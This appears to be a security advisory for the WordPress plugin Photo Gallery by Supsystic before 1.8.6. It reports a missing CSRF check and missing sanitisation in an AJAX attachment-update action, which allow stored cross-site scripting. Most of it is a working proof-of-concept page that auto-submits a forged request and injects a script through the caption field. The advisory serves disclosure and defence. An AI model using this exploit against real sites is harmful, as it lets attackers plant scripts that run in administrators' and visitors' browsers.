Photo Gallery by Supsystic < 1.8.6 – Stored Cross-Site Scripting via CSRF

Description

The plugin does not have CSRF check in place and it lacking sanitisation as well as escaping via in AJAX action to update attachment, which could lead to Stored XSS via CSRF

Proof of Concept

<html>
   <body>
      <form method="post" action="https://<target>/wp-admin/admin-ajax.php">
         <input type="hidden" name="caption" value='this is the caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
         <input type="hidden" name="captionEffect" value="quarter-slide-up">
         <input type="hidden" name="description" value="">
         <input type="hidden" name="alt" value="Capture">
         <input type="hidden" name="link" value="">
         <input type="hidden" name="cropPosition" value="center-center">
         <input type="hidden" name="replace_attachment_id" value="">
         <input type="hidden" name="image_id" value="13">
         <input type="hidden" name="attachment_id" value="10">
         <input type="hidden" name="gallery_id" value="6">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="route[module]" value="photos">
         <input type="hidden" name="route[action]" value="updateAttachment">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>